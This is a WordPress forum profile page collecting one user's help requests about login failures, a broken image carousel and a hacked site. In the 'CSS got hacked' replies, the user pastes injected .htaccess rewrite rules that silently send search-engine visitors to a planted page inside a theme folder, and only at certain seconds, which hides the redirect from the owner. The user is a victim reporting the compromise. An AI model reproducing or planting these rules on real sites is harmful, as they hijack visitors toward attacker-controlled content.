dioni
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Various problems after upgrading to wordpress 4.0The problems seem to fix itself overnight. A glitch in the database maybe? Cheers.
Forum: Plugins
In reply to: [Jetpack - WP Security, Backup, Speed, & Growth] Carousel doesn't workDid this ever get resolved? I’ve been having the same problem for a few weeks too now. The carousel hasn’t worked for a while. Example:
https://www.wanderingmee.com/2013/03/summer-in-provence-france/It seems to started happening since the link of the images are changed to include the mysterious https://i1.wp.com/ in front of the actual image link. I don’t understand what’s the use of that, because I host all my images on my own server. e.g.
https://i1.wp.com/www.wanderingmee.com/wp-content/uploads/2013/03/286A3052.jpg
It would work without the prefix too, e.g.
https://www.wanderingmee.com/wp-content/uploads/2013/03/286A3052.jpgHelp? Thanks much in advance.
Forum: Fixing WordPress
In reply to: Uploaded pictures suddenly contain errorOh this is one of the image example containing error:
https://mee.meexia.com/wp-content/uploads/2012/06/IMG_7712-1024×682.jpg
Forum: Fixing WordPress
In reply to: Upgraded to 2.6. Now I can’t log in.Okay I just found out one thing. I CAN log in with IE, but NOT FIREFOX.
Forum: Fixing WordPress
In reply to: Upgraded to 2.6. Now I can’t log in.What does it mean when it says “Please log in again.” ???
If my password is wrong it will say incorrect password. But it doesn’t say that.
Argh this is frustrating! What should I do??!Forum: Installing WordPress
In reply to: Need Help: WordPress site redirects to a different domainThis kinda happens to me too. I created a new fresh wordpress folder, then modified the config file to use my other wordpress database. When I go to the new subfolder now (from the browser), it keeps directing me back to the old one.
Forum: Fixing WordPress
In reply to: Upgraded to 2.6. Now I can’t log in.I tried that. I’m guessing this has nothing to do with the database. I think there’s a pipeline error somewhere.
Forum: Plugins
In reply to: CSS got hackedOkay I just saw that this line looks very suspicious:
RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]Many months ago I got a few emails from various people saying that my server has been compromised and that it hosted some files attacking other people’s servers. I’ve deleted the folder and looks like it contains new files now (they’re different than the last ones). So I just deleted that folder again, and then delete the .htaccess file on /blog/ directory (cos the content looked suspicious too). I wonder if that’s enough. I think it’s possible that there was some harmful file inside a wordpress theme that I put in.
Forum: Plugins
In reply to: CSS got hackedThis is the content of my .htaccess in main directory:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^https://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520cThis is the content of my .htaccess in bookie directory:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /bookie/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^https://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520cRewriteRule . /bookie/index.php [L]
</IfModule># END WordPress
Forum: Plugins
In reply to: CSS got hackedWell, I just don’t get how it worked one day and not the next day. It also works for a few of my wordpress sites and not for a couple of them (which I suspected got hacked) –> all hosted on the same server. Anybody can think of anything else?
Meanwhile I’ll try to talk with my hosting service. But I doubt that this is the problem, because it DOES work with my other wordpress blogs (I have multiple wordpress installations on the server).
Note that initial installation worked fine. Then it got messed up the next day. Why would my host alter any files or the setting of ONE subfolder? (and without telling me) I have wordpress blogs on other folders and they’re all fine. And I’m using godaddy btw, so it should be quite reliable.
Forum: Plugins
In reply to: CSS got hackedI meant you can’t access them from browsers (like what you tried). I checked that all files have sensible size too (no 0 size).
Forum: Plugins
In reply to: CSS got hackedWell yea that’s the problem. The file is there when I check it with ftp! With the right permission too (644), all folders with the right permission. Basically all my files are intact. But you can’t access it.